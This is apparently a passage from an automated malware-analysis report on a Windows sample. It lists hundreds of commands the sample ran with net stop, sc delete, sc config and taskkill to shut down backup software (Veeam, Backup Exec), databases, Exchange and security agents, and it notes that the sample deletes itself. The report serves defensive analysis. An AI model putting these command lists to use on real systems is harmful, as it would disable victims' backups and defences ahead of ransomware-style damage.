  • '<SYSTEM32>\net.exe' stop MSExchangeServiceHost
  • '<SYSTEM32>\net.exe' stop MSExchangeTransport
  • '<SYSTEM32>\taskkill.exe' /IM AndroidServer.exe /F
Terminates or attempts to terminate
the following system processes:
  • <SYSTEM32>\cmd.exe
the following user processes:
  • iexplore.exe
Modifies file system
Creates the following files
  • %TEMP%\5cde.tmp\5d0e.tmp\5d0f.bat
Deletes the following files
  • %TEMP%\5cde.tmp\5d0e.tmp\5d0f.bat
Deletes itself.
Miscellaneous
Searches for the following windows
  • ClassName: '' WindowName: ''
Executes the following
  • '<SYSTEM32>\cmd.exe' /c "%TEMP%\5CDE.tmp\5D0E.tmp\5D0F.bat <Full path to file>"
  • '<SYSTEM32>\sc.exe' delete GPSMediaSvr
  • '<SYSTEM32>\sc.exe' delete BackupExecAgentAccelerator
  • '<SYSTEM32>\net1.exe' stop "MSSQL$OPTIMA"
  • '<SYSTEM32>\sc.exe' delete Mysoft.SchedulingService
  • '<SYSTEM32>\sc.exe' delete "Zabbix Agent"
  • '<SYSTEM32>\net1.exe' stop OracleDBConsoleilas
  • '<SYSTEM32>\net1.exe' stop VeeamBrokerSvc
  • '<SYSTEM32>\net1.exe' stop MSExchangeRPC
  • '<SYSTEM32>\sc.exe' delete Mysoft.DataCenterService
  • '<SYSTEM32>\sc.exe' delete GPSFtpd
  • '<SYSTEM32>\net1.exe' stop "MSSQLFDLauncher$OPTIMA"
  • '<SYSTEM32>\sc.exe' delete Mysoft.Config.WindowsService
  • '<SYSTEM32>\net1.exe' stop MSExchangeServiceHost
  • '<SYSTEM32>\net1.exe' stop "OracleOraDb10g_homeliSQL*Plus"
  • '<SYSTEM32>\net1.exe' stop MSExchangeRepl
  • '<SYSTEM32>\sc.exe' delete GPSMysqld
  • '<SYSTEM32>\sc.exe' delete Mysoft.Autoupgrade.UpdateService
  • '<SYSTEM32>\sc.exe' delete GPSTomcat6
  • '<SYSTEM32>\net1.exe' stop CASMsgSrv
  • '<SYSTEM32>\net1.exe' stop VeeamCloudSvc
  • '<SYSTEM32>\net1.exe' stop MSExchangePOP3BE
  • '<SYSTEM32>\net1.exe' stop "SQLAgent$WOLTERSKLUWER"
  • '<SYSTEM32>\sc.exe' delete Mysoft.Autoupgrade.DispatchService
  • '<SYSTEM32>\sc.exe' delete GPSLoginSvr
  • '<SYSTEM32>\sc.exe' delete ErpEnvSvc
  • '<SYSTEM32>\net1.exe' stop CASVirtualDiskService
  • '<SYSTEM32>\net1.exe' stop VeeamMountSvc
  • '<SYSTEM32>\net1.exe' stop VeeamDeploySvc
  • '<SYSTEM32>\net1.exe' stop MySQL
  • '<SYSTEM32>\sc.exe' delete Mysoft.Setup.InstallService
  • '<SYSTEM32>\net1.exe' stop K3MobileServiceManage
  • '<SYSTEM32>\net1.exe' stop ClickToRunSvc
  • '<SYSTEM32>\net1.exe' stop MSExchangeTransportLogSearch
  • '<SYSTEM32>\sc.exe' delete BackupExecManagementService
  • '<SYSTEM32>\net1.exe' stop "msftesql$SQLEXPRESS"
  • '<SYSTEM32>\sc.exe' delete ShareBoxMonitorService
  • '<SYSTEM32>\sc.exe' delete BackupExecJobEngine
  • '<SYSTEM32>\net1.exe' stop TPlusStdUpgradeService1220
  • '<SYSTEM32>\net1.exe' stop 360EntPGSvc
  • '<SYSTEM32>\net1.exe' stop MSExchangeTransport
  • '<SYSTEM32>\sc.exe' delete savsvc
  • '<SYSTEM32>\sc.exe' delete BackupExecAgentBrowser
  • '<SYSTEM32>\net1.exe' stop TPlusStdTaskService1220
  • '<SYSTEM32>\net1.exe' stop "ReportServer$OPTIMA"
  • '<SYSTEM32>\sc.exe' delete abs_deployer
  • '<SYSTEM32>\net1.exe' stop ServiceMid
  • '<SYSTEM32>\net1.exe' stop MSExchangeThrottling
  • '<SYSTEM32>\sc.exe' delete BackupExecRPCService
  • '<SYSTEM32>\sc.exe' delete edr_monitor
  • '<SYSTEM32>\sc.exe' delete BackupExecDeviceMediaService
  • '<SYSTEM32>\net1.exe' stop TPlusStdAppService1220
  • '<SYSTEM32>\net1.exe' stop tmlisten
  • '<SYSTEM32>\net1.exe' stop MSExchangeSubmission
  • '<SYSTEM32>\net1.exe' stop "SQLAgent$OPTIMA"
  • '<SYSTEM32>\sc.exe' delete MysoftUpdate
  • '<SYSTEM32>\sc.exe' delete bedbg
  • '<SYSTEM32>\net1.exe' stop VeeamDistributionSvc
  • '<SYSTEM32>\net1.exe' stop MSExchangePop3
  • '<SYSTEM32>\net1.exe' stop "SQLAgent$PROGID"
  • '<SYSTEM32>\sc.exe' delete TbossSystem
  • '<SYSTEM32>\net1.exe' stop MSExchangeImap4
  • '<SYSTEM32>\sc.exe' delete OracleRemExecService
  • '<SYSTEM32>\net1.exe' stop CASXMLService
  • '<SYSTEM32>\net1.exe' stop TPlusStdAppService1300
  • '<SYSTEM32>\net1.exe' stop MSExchangeIMAP4BE
  • '<SYSTEM32>\sc.exe' delete NFWebServer
  • '<SYSTEM32>\sc.exe' delete MediatekRegistryWriter
  • '<SYSTEM32>\sc.exe' delete QQCertificateService
  • '<SYSTEM32>\sc.exe' delete "OSP Service"
  • '<SYSTEM32>\net1.exe' stop "SQLTELEMETRY$HL"
  • '<SYSTEM32>\net1.exe' stop "AliyunService"
  • '<SYSTEM32>\net1.exe' stop VeeamTransportSvc
  • '<SYSTEM32>\sc.exe' delete wampapache
  • '<SYSTEM32>\sc.exe' delete RaAutoInstSrv_RT2870
  • '<SYSTEM32>\net1.exe' stop "TMBMServer"
  • '<SYSTEM32>\sc.exe' delete LPManager
  • '<SYSTEM32>\sc.exe' delete 360EntClientSvc
  • '<SYSTEM32>\sc.exe' delete "FontCache3.0.0.0"
  • '<SYSTEM32>\net1.exe' stop "Alibaba Security Aegis Update Service"
  • '<SYSTEM32>\net1.exe' stop VeeanBackupSvc
  • '<SYSTEM32>\net1.exe' stop MSExchangeHMRecovery
  • '<SYSTEM32>\sc.exe' delete vmware-converter-server
  • '<SYSTEM32>\sc.exe' delete BestSyncSvc
  • '<SYSTEM32>\sc.exe' delete 360EntSvc
  • '<SYSTEM32>\sc.exe' delete LMS
  • '<SYSTEM32>\net1.exe' stop "MSSQLFDLauncher"
  • '<SYSTEM32>\sc.exe' delete vmware-converter-worker
  • '<SYSTEM32>\sc.exe' delete GPSDaemon
  • '<SYSTEM32>\sc.exe' delete GPSGatewaySvr
  • '<SYSTEM32>\sc.exe' delete CobianBackup10
  • '<SYSTEM32>\sc.exe' delete OracleMTSRecoveryService
  • '<SYSTEM32>\sc.exe' delete CASLicenceServer
  • '<SYSTEM32>\net1.exe' stop iNethinkSQLBackupSvc
  • '<SYSTEM32>\net1.exe' stop VeeamNFSSvc
  • '<SYSTEM32>\net1.exe' stop MSExchangeNotificationsBroker
  • '<SYSTEM32>\sc.exe' delete semwebsrv
  • '<SYSTEM32>\sc.exe' delete GPSDataProcSvr
  • '<SYSTEM32>\net1.exe' stop "MSSQL$WOLTERSKLUWER"
  • '<SYSTEM32>\net1.exe' stop DDNSService
  • '<SYSTEM32>\net1.exe' stop TPlusStdWebService1300
  • '<SYSTEM32>\net1.exe' stop MSExchangeMailboxReplication
  • '<SYSTEM32>\sc.exe' delete SQLService
  • '<SYSTEM32>\sc.exe' delete OracleDBConcoleorcl
  • '<SYSTEM32>\sc.exe' delete GPSStorageSvr
  • '<SYSTEM32>\sc.exe' delete "SyncBASE Service"
  • '<SYSTEM32>\sc.exe' delete MSSEARCH
  • '<SYSTEM32>\sc.exe' delete GPSDownSvr
  • '<SYSTEM32>\net1.exe' stop RapService
  • '<SYSTEM32>\net1.exe' stop TPlusStdUpgradeService1300
  • '<SYSTEM32>\net1.exe' stop MSExchangeMailboxAssistants
  • '<SYSTEM32>\net1.exe' stop "MSSQL$PROGID"
  • '<SYSTEM32>\sc.exe' delete SQLANYs_sem5
  • '<SYSTEM32>\sc.exe' delete msftesql
  • '<SYSTEM32>\sc.exe' delete GPSUserSvr
  • '<SYSTEM32>\net1.exe' stop AGSService
  • '<SYSTEM32>\net1.exe' stop TPlusStdTaskService1300
  • '<SYSTEM32>\net1.exe' stop MSExchangeIS
  • '<SYSTEM32>\net1.exe' stop "ReportServer"
  • '<SYSTEM32>\net1.exe' stop "MSSQLSERVER"
  • '<SYSTEM32>\sc.exe' delete ShareBoxService
  • '<SYSTEM32>\sc.exe' delete RemoteAssistService
  • '<SYSTEM32>\net1.exe' stop NFOTPService
  • '<SYSTEM32>\net1.exe' stop U8DispatchService
  • '<SYSTEM32>\net1.exe' stop NFSysService
  • '<SYSTEM32>\net1.exe' stop TurboCRM70
  • '<SYSTEM32>\net1.exe' stop DGPNPSEV
  • '<SYSTEM32>\net1.exe' stop SentinelKeysServer
  • '<SYSTEM32>\net1.exe' stop AgentX
  • '<SYSTEM32>\net1.exe' stop "ABBYY.Licensing.FineReader.Professional.12.0"
  • '<SYSTEM32>\sc.exe' delete "U8WorkerService1"
  • '<SYSTEM32>\net1.exe' stop Mysoft.SchedulingService
  • '<SYSTEM32>\net1.exe' stop "Apple Mobile Device Service"
  • '<SYSTEM32>\sc.exe' delete UTUService
  • '<SYSTEM32>\net1.exe' stop KugouService
  • '<SYSTEM32>\sc.exe' delete UFReportService
  • '<SYSTEM32>\net1.exe' stop GNWebService
  • '<SYSTEM32>\sc.exe' delete MSCRMAsyncService$maintenance
  • '<SYSTEM32>\sc.exe' delete UFAllNet
  • '<SYSTEM32>\net1.exe' stop U8SendMailAdmin
  • '<SYSTEM32>\net1.exe' stop CobianBackup10
  • '<SYSTEM32>\sc.exe' delete MSCRMUnzipService
  • '<SYSTEM32>\sc.exe' delete "U8WebPool"
  • '<SYSTEM32>\sc.exe' delete NscAuthService
  • '<SYSTEM32>\sc.exe' delete U8TaskService
  • '<SYSTEM32>\net1.exe' stop pcas
  • '<SYSTEM32>\net1.exe' stop RTCAVMCU
  • '<SYSTEM32>\sc.exe' delete MASTER
  • '<SYSTEM32>\net1.exe' stop "Bonjour Service"
  • '<SYSTEM32>\sc.exe' delete U8SLReportService
  • '<SYSTEM32>\net1.exe' stop U8EISService
  • '<SYSTEM32>\sc.exe' delete "ReportServer$SQLEXPRESS"
  • '<SYSTEM32>\net1.exe' stop SBOMail
  • '<SYSTEM32>\net1.exe' stop SBOJobServiceBackEnd
  • '<SYSTEM32>\net1.exe' stop SBODI_Server
  • '<SYSTEM32>\net1.exe' stop SBOClientAgent
  • '<SYSTEM32>\net1.exe' stop SAPB1iEventSender
  • '<SYSTEM32>\net1.exe' stop "SAPB1iDIProxy_Monitor"
  • '<SYSTEM32>\net1.exe' stop SAPB1iDIProxy
  • '<SYSTEM32>\net1.exe' stop "SAP Business One RSP Agent Service"
  • '<SYSTEM32>\net1.exe' stop cbVSCService
  • '<SYSTEM32>\net1.exe' stop "SQLBackupAndFTP Client Service"
  • '<SYSTEM32>\sc.exe' delete CobianBackup11
  • '<SYSTEM32>\sc.exe' delete cbVSCService11
  • '<SYSTEM32>\sc.exe' delete "SQL Server Reporting Services"
  • '<SYSTEM32>\net1.exe' stop U8EncryptService
  • '<SYSTEM32>\sc.exe' delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai"
  • '<SYSTEM32>\net1.exe' stop UFNet
  • '<SYSTEM32>\net1.exe' stop UTUService
  • '<SYSTEM32>\net1.exe' stop UFReportService
  • '<SYSTEM32>\net1.exe' stop UFAllNet
  • '<SYSTEM32>\net1.exe' stop U8WebPool
  • '<SYSTEM32>\net1.exe' stop U8TaskService
  • '<SYSTEM32>\net1.exe' stop U8SLReportService
  • '<SYSTEM32>\net1.exe' stop U8SCMPool
  • '<SYSTEM32>\net1.exe' stop U8MPool
  • '<SYSTEM32>\net1.exe' stop U8KeyManagePool
  • '<SYSTEM32>\net1.exe' stop U8GCService
  • '<SYSTEM32>\sc.exe' delete TongBackupSrv
  • '<SYSTEM32>\net1.exe' stop NFVPrintServer
  • '<SYSTEM32>\sc.exe' delete U8SCMPool
  • '<SYSTEM32>\net1.exe' stop JWService
  • '<SYSTEM32>\sc.exe' delete EASService
  • '<SYSTEM32>\sc.exe' config "SQLTELEMETRY" start= disabled
  • '<SYSTEM32>\net1.exe' stop AutoUpdatePatchService
  • '<SYSTEM32>\net1.exe' stop NFLicenceServer
  • '<SYSTEM32>\sc.exe' delete Serv-U
  • '<SYSTEM32>\sc.exe' config "SQLBrowser" start= disabled
  • '<SYSTEM32>\sc.exe' delete KICkSvr
  • '<SYSTEM32>\sc.exe' delete YunService
  • '<SYSTEM32>\net1.exe' stop ImtsEventSvr
  • '<SYSTEM32>\net1.exe' stop d_safe
  • '<SYSTEM32>\net1.exe' stop MySQL5_OA
  • '<SYSTEM32>\sc.exe' config "SQLSERVERAGENT" start= disabled
  • '<SYSTEM32>\net1.exe' stop OMAILREPORT
  • '<SYSTEM32>\sc.exe' delete U8SmsSrv
  • '<SYSTEM32>\net1.exe' stop "NetVault Process Manager"
  • '<SYSTEM32>\net1.exe' stop DDVRulesProcessor
  • '<SYSTEM32>\net1.exe' stop AngelOfDeath
  • '<SYSTEM32>\net1.exe' stop MSExchangeUMCR
  • '<SYSTEM32>\sc.exe' config "MSSQLFDLauncher" start= disabled
  • '<SYSTEM32>\sc.exe' delete Gailun_Downloader
  • '<SYSTEM32>\sc.exe' delete "U8WorkerService2"
  • '<SYSTEM32>\sc.exe' delete TxQBService
  • '<SYSTEM32>\net1.exe' stop "FileZilla Server"
  • '<SYSTEM32>\net1.exe' stop RavTask
  • '<SYSTEM32>\net1.exe' stop MSExchangeUM
  • '<SYSTEM32>\net1.exe' stop "postgresql-x64-9.4"
  • '<SYSTEM32>\sc.exe' delete CIS
  • '<SYSTEM32>\sc.exe' delete "Rpc Monitor"
  • '<SYSTEM32>\sc.exe' delete RTCASMCU
  • '<SYSTEM32>\sc.exe' delete MDM
  • '<SYSTEM32>\sc.exe' delete "EasyFZS Server"
  • '<SYSTEM32>\sc.exe' delete "U8MPool"
  • '<SYSTEM32>\net1.exe' stop ceng_web_svc_d
  • '<SYSTEM32>\net1.exe' stop K3ClouManager
  • '<SYSTEM32>\sc.exe' delete RtcSrv
  • '<SYSTEM32>\sc.exe' delete U8KeyManagePool
  • '<SYSTEM32>\net1.exe' stop KpService
  • '<SYSTEM32>\net1.exe' stop EvtSys
  • '<SYSTEM32>\sc.exe' delete OfficeUpdateService
  • '<SYSTEM32>\sc.exe' delete U8GCService
  • '<SYSTEM32>\sc.exe' delete asComSvc
  • '<SYSTEM32>\sc.exe' delete U8EncryptService
  • '<SYSTEM32>\net1.exe' stop K3MMainSuspendService
  • '<SYSTEM32>\net1.exe' stop IngressMgr
  • '<SYSTEM32>\sc.exe' delete "Daemon Service"
  • '<SYSTEM32>\sc.exe' delete U8EISService
  • '<SYSTEM32>\net1.exe' stop DFServ
  • '<SYSTEM32>\net1.exe' stop SupportAssistAgent
  • '<SYSTEM32>\sc.exe' delete "Nuo Update Monitor"
  • '<SYSTEM32>\sc.exe' delete U8DispatchService
  • '<SYSTEM32>\sc.exe' config "SSISTELEMETRY130" start= disabled
  • '<SYSTEM32>\net1.exe' stop "Dell Hardware Support"
  • '<SYSTEM32>\net1.exe' stop RavService
  • '<SYSTEM32>\sc.exe' delete TurboCRM70
  • '<SYSTEM32>\sc.exe' delete OpenFastAssist
  • '<SYSTEM32>\sc.exe' config "MsDtsServer130" start= disabled
  • '<SYSTEM32>\sc.exe' delete OfficeClearCache
  • '<SYSTEM32>\sc.exe' delete CloudExchangeService
  • '<SYSTEM32>\sc.exe' delete vmware-converter-agent
  • '<SYSTEM32>\sc.exe' delete "FlexNet Licensing Service 64"
  • '<SYSTEM32>\sc.exe' delete 360EntHttpServer
  • '<SYSTEM32>\sc.exe' config "MSSQLServerADHelper100" start= disabled
  • '<SYSTEM32>\sc.exe' delete JhTask
  • '<SYSTEM32>\net1.exe' stop UFIDAWebService
  • '<SYSTEM32>\net1.exe' stop XenSvc
  • '<SYSTEM32>\net1.exe' stop VMAuthdService
  • '<SYSTEM32>\sc.exe' config "MSSQLServerOLAPService" start= disabled
  • '<SYSTEM32>\sc.exe' delete K3MobileService
  • '<SYSTEM32>\sc.exe' delete RTCMEETINGMCU
  • '<SYSTEM32>\sc.exe' delete ftusbrdwks
  • '<SYSTEM32>\sc.exe' delete MSSQLSERVER
  • '<SYSTEM32>\net1.exe' stop SQLSERVERAGENT
  • '<SYSTEM32>\net1.exe' stop "MsDtsServer130"
  • '<SYSTEM32>\sc.exe' delete QcSoftService
  • '<SYSTEM32>\sc.exe' config SQLSERVERAGENT start=disabled
  • '<SYSTEM32>\sc.exe' delete FxService
  • '<SYSTEM32>\net1.exe' stop xenlite
  • '<SYSTEM32>\net1.exe' stop Apache2.4
  • '<SYSTEM32>\sc.exe' delete UI0Detect
  • '<SYSTEM32>\sc.exe' delete MSSQLFDLauncher
  • '<SYSTEM32>\sc.exe' delete "UtilDev Web Server Pro"
  • '<SYSTEM32>\sc.exe' delete RtcQms
  • '<SYSTEM32>\sc.exe' delete aspnet_state @sc delete Redis
  • '<SYSTEM32>\sc.exe' config "SQLAgent" start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$ start=disabled
  • '<SYSTEM32>\sc.exe' delete EnergyDataService
  • '<SYSTEM32>\sc.exe' delete SQLBrowser
  • '<SYSTEM32>\net1.exe' stop VMUSBArbService
  • '<SYSTEM32>\net1.exe' stop "ReportServer$SHOPCONTROL9"
  • '<SYSTEM32>\sc.exe' delete RTCIMMCU
  • '<SYSTEM32>\net1.exe' stop "SQLTELEMETRY"
  • '<SYSTEM32>\sc.exe' delete MCService
  • '<SYSTEM32>\net1.exe' stop MSExchangeADTopology
  • '<SYSTEM32>\net1.exe' stop "Synology Drive VSS Service x64"
  • '<SYSTEM32>\net1.exe' stop WebAttendServer
  • '<SYSTEM32>\sc.exe' config "SQLTELEMETRY$HL" start= disabled
  • '<SYSTEM32>\sc.exe' config SQLBrowser start=disabled
  • '<SYSTEM32>\sc.exe' delete UIODetect
  • '<SYSTEM32>\sc.exe' delete RTCCDR
  • '<SYSTEM32>\sc.exe' delete "ZTE USBIP Client"
  • '<SYSTEM32>\sc.exe' delete VMTools
  • '<SYSTEM32>\sc.exe' delete XT800Service_Personal
  • '<SYSTEM32>\sc.exe' delete ftusbrdsrv
  • '<SYSTEM32>\net1.exe' stop "NetBackup Discovery Framework"
  • '<SYSTEM32>\sc.exe' config "ReportServer" start= disabled
  • '<SYSTEM32>\net1.exe' stop MSComplianceAudit
  • '<SYSTEM32>\net1.exe' stop Apache2.2
  • '<SYSTEM32>\net1.exe' stop wanxiao-monitor
  • '<SYSTEM32>\sc.exe' delete WebAttendServer
  • '<SYSTEM32>\sc.exe' delete RTCDATAMCU
  • '<SYSTEM32>\sc.exe' delete "ZTE USBIP Client Guard"
  • '<SYSTEM32>\sc.exe' delete MSSQLServerOLAPService
  • '<SYSTEM32>\net1.exe' stop "SSISTELEMETRY130"
  • '<SYSTEM32>\sc.exe' delete ImeDictUpdateService
  • '<SYSTEM32>\sc.exe' config "MsDtsServer100" start= disabled
  • '<SYSTEM32>\sc.exe' delete TCPIDDAService
  • '<SYSTEM32>\net1.exe' stop SQLBrowser
  • '<SYSTEM32>\net1.exe' stop "NetBackup Client Service"
  • '<SYSTEM32>\net1.exe' stop "MSSQLFDLauncher$SHOPCONTROL9"
  • '<SYSTEM32>\sc.exe' delete RTCAVMCU
  • '<SYSTEM32>\sc.exe' config MSSQLSERVER start=disabled
  • '<SYSTEM32>\sc.exe' delete OracleOraDb11g_home1ClrAgent
  • '<SYSTEM32>\sc.exe' config "SQLWriter" start= disabled
  • '<SYSTEM32>\net1.exe' stop "SQLSERVERAGENT"
  • '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM VBoxSDS.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM TeamViewer_Service.exe /F & @taskkill /IM TeamViewer.exe /F & @taskkill /IM CasLicenceServer.exe /F & @t...
  • '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM BackupExec.exe /F & @taskkill /IM Att.exe /F & @taskkill /IM mdm.exe /F & @taskkill /IM BackupExecManagementService.exe /F & @taskkill /IM bengine.exe /F & @taskkill...
  • '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_ma...
  • '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & ...
  • '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM Veeam.Backup...
  • '<SYSTEM32>\cmd.exe' /c "color a & @net stop UIODetect & @net stop VMwareHostd & @net stop TeamViewer8 & @net stop VMUSBArbService & @net stop VMAuthdService & @net stop wanxiao-monitor & @net stop WebAttendServer ...
  • '<SYSTEM32>\cmd.exe' /c "color a & @net stop HaoZipSvc & @net stop "igfxCUIService2.0.0.0" & @net stop Realtek11nSU & @net stop xenlite & @net stop XenSvc & @net stop Apache2.2 & @net stop "Synology Drive VSS Servi...
  • '<SYSTEM32>\sc.exe' delete "UWS LoPriv Services"
  • '<SYSTEM32>\cmd.exe' /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop ...
  • '<SYSTEM32>\cmd.exe' /c "@color b & sc delete MSCRMAsyncService & @sc delete REPLICA & @sc delete RTCATS & @sc delete RTCAVMCU & @sc delete RtcQms & @sc delete RTCMEETINGMCU & @sc delete RTCIMMCU & @sc delete RTCDA...
  • '<SYSTEM32>\cmd.exe' /c "color b & @sc delete "UWS LoPriv Services" & @sc delete ftnlsv3 & @sc delete ftnlses3 & @sc delete FxService & @sc delete "UtilDev Web Server Pro" & @sc delete ftusbrdwks & @sc delete ftusb...
  • '<SYSTEM32>\cmd.exe' /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc ...
  • '<SYSTEM32>\cmd.exe' /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc d...
  • '<SYSTEM32>\cmd.exe' /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete Qc...
  • '<SYSTEM32>\cmd.exe' /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement...
  • '<SYSTEM32>\cmd.exe' /c "color b & @taskkill /IM Tomcat7w.exe /F & @taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F & @taskkill /IM UFSoft.U8.OC.QuartzScheduler.exe /F & @taskkill /IM Launchpad.exe /F & @taskkil...
  • '<SYSTEM32>\cmd.exe' /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" ...
  • '<SYSTEM32>\cmd.exe' /c "color b & taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe & taskkill /F /IM Veeam.Backup.BrokerService.exe & taskkill /F /IM Veeam.Backup.CatalogDataService.exe & taskkill /F /I...
  • '<SYSTEM32>\cmd.exe' /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc confi...
  • '<SYSTEM32>\cmd.exe' /c "color b & sc config "SQLWriter" start= disabled & sc config "MSSQL$VEEAMSQL2012" start= disabled & sc config "SQLAgent$VEEAMSQL2012" start= disabled & sc config "MSSQL" start= disabled & sc...
  • '<SYSTEM32>\cmd.exe' /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAM...
  • '<SYSTEM32>\cmd.exe' /c "color b & @taskkill /IM ReportingServicesService.exe /F & @sc delete "SQL Server Reporting Services" & @sc delete MSSQLFDLauncher & @taskkill /IM U8CEServer.exe /F & @taskkill /IM ServerNT....
  • '<SYSTEM32>\sc.exe' delete "XT800Service_Personal"
  • '<SYSTEM32>\sc.exe' delete "DAService_TCP"
  • '<SYSTEM32>\sc.exe' delete MSCRMAsyncService
  • '<SYSTEM32>\net1.exe' stop U8WorkerService1
  • '<SYSTEM32>\net1.exe' stop TeamViewer8
  • '<SYSTEM32>\net1.exe' stop "igfxCUIService2.0.0.0"
  • '<SYSTEM32>\net1.exe' stop Realtek11nSU
  • '<SYSTEM32>\net1.exe' stop "memcached Server"
  • '<SYSTEM32>\sc.exe' config "MSSQL" start= disabled
  • '<SYSTEM32>\net1.exe' stop MSSQL$
  • '<SYSTEM32>\sc.exe' delete eCardMPService
  • '<SYSTEM32>\sc.exe' delete SQLWriter
  • '<SYSTEM32>\sc.exe' delete ftnlses3
  • '<SYSTEM32>\sc.exe' delete RTCATS
  • '<SYSTEM32>\sc.exe' delete OracleVssWriterORCL
  • '<SYSTEM32>\sc.exe' config "SQLAgent$VEEAMSQL2012" start= disabled
  • '<SYSTEM32>\net1.exe' stop "MSSQL$SHOPCONTROL9"
  • '<SYSTEM32>\net1.exe' stop VMwareHostd
  • '<SYSTEM32>\net1.exe' stop U8WorkerService2
  • '<SYSTEM32>\sc.exe' delete OracleServiceORCL
  • '<SYSTEM32>\sc.exe' delete "eCard-TTransServer"
  • '<SYSTEM32>\sc.exe' delete SQLSERVERAGENT
  • '<SYSTEM32>\sc.exe' delete ftnlsv3
  • '<SYSTEM32>\sc.exe' config "SQL Server (MSSQLSERVER)" start=disabled
  • '<SYSTEM32>\net1.exe' stop "SQLBrowser"
  • '<SYSTEM32>\sc.exe' delete REPLICA
  • '<SYSTEM32>\sc.exe' delete OracleOraDb11g_home1TNSListener
  • '<SYSTEM32>\sc.exe' config "MSSQL$VEEAMSQL2012" start= disabled
  • '<SYSTEM32>\net1.exe' stop "MSOLAP$SHOPCONTROL9"
  • '<SYSTEM32>\net1.exe' stop UIODetect
  • '<SYSTEM32>\net1.exe' stop HaoZipSvc
  • '<SYSTEM32>\net1.exe' stop "SQLWrite"
  • '<SYSTEM32>\sc.exe' delete VGAuthService
  • '<SYSTEM32>\net1.exe' stop "SQLAgent$SHOPCONTROL9"
  • '<SYSTEM32>\sc.exe' delete "ZTE FileTranS"
  • '<SYSTEM32>\net1.exe' stop SQLANYs_Sage_FAS_Fixed_Assets
  • '<SYSTEM32>\sc.exe' delete Jenkins
  • '<SYSTEM32>\net1.exe' stop CASLicenceServer
  • '<SYSTEM32>\net1.exe' stop RapidRecoveryAgent
  • '<SYSTEM32>\net1.exe' stop MSExchangeFastSearch
  • '<SYSTEM32>\sc.exe' delete KuaiYunTools
  • '<SYSTEM32>\sc.exe' delete ADWS
  • '<SYSTEM32>\sc.exe' delete secbizsrv
  • '<SYSTEM32>\sc.exe' delete MSSQL$SQL2008
  • '<SYSTEM32>\net1.exe' stop "MSSQLServerADHelper100"
  • '<SYSTEM32>\net1.exe' stop MSSQL$RE_EXPRESS
  • '<SYSTEM32>\sc.exe' delete MsDtsServer100
  • '<SYSTEM32>\sc.exe' delete AppFabricCachingService
  • '<SYSTEM32>\sc.exe' delete MotionBoard57
  • '<SYSTEM32>\sc.exe' delete SQLAgent$SQL2008
  • '<SYSTEM32>\sc.exe' delete SQLTELEMETRY
  • '<SYSTEM32>\net1.exe' stop Service2
  • '<SYSTEM32>\net1.exe' stop MSExchangeEdgeSync
  • '<SYSTEM32>\sc.exe' delete IpOverUsbSvc
  • '<SYSTEM32>\sc.exe' delete c2wts
  • '<SYSTEM32>\sc.exe' delete apachezt
  • '<SYSTEM32>\sc.exe' delete SSSyncService
  • '<SYSTEM32>\sc.exe' config MSSQL$FE_EXPRESS start= disabled
  • '<SYSTEM32>\net1.exe' stop "SQLAgent"
  • '<SYSTEM32>\sc.exe' delete OracleJobSchedulerORCL
  • '<SYSTEM32>\sc.exe' delete ProjectCalcService16
  • '<SYSTEM32>\sc.exe' delete eSightService
  • '<SYSTEM32>\net1.exe' stop QPCore
  • '<SYSTEM32>\sc.exe' delete KMSELDI
  • '<SYSTEM32>\sc.exe' delete jhi_service
  • '<SYSTEM32>\sc.exe' delete SSMonitorService
  • '<SYSTEM32>\sc.exe' delete ProjectEventService16
  • '<SYSTEM32>\net1.exe' stop "Alibaba Security Aegis Detect Service"
  • '<SYSTEM32>\net1.exe' stop VeeamCatalogSvc
  • '<SYSTEM32>\net1.exe' stop MSSQL$SQL2008
  • '<SYSTEM32>\sc.exe' config MSSQL$VIM_SQLEXP start=disabled
  • '<SYSTEM32>\sc.exe' delete 2345PicSvc
  • '<SYSTEM32>\sc.exe' delete VisualSVNServer
  • '<SYSTEM32>\sc.exe' delete zyb_sync
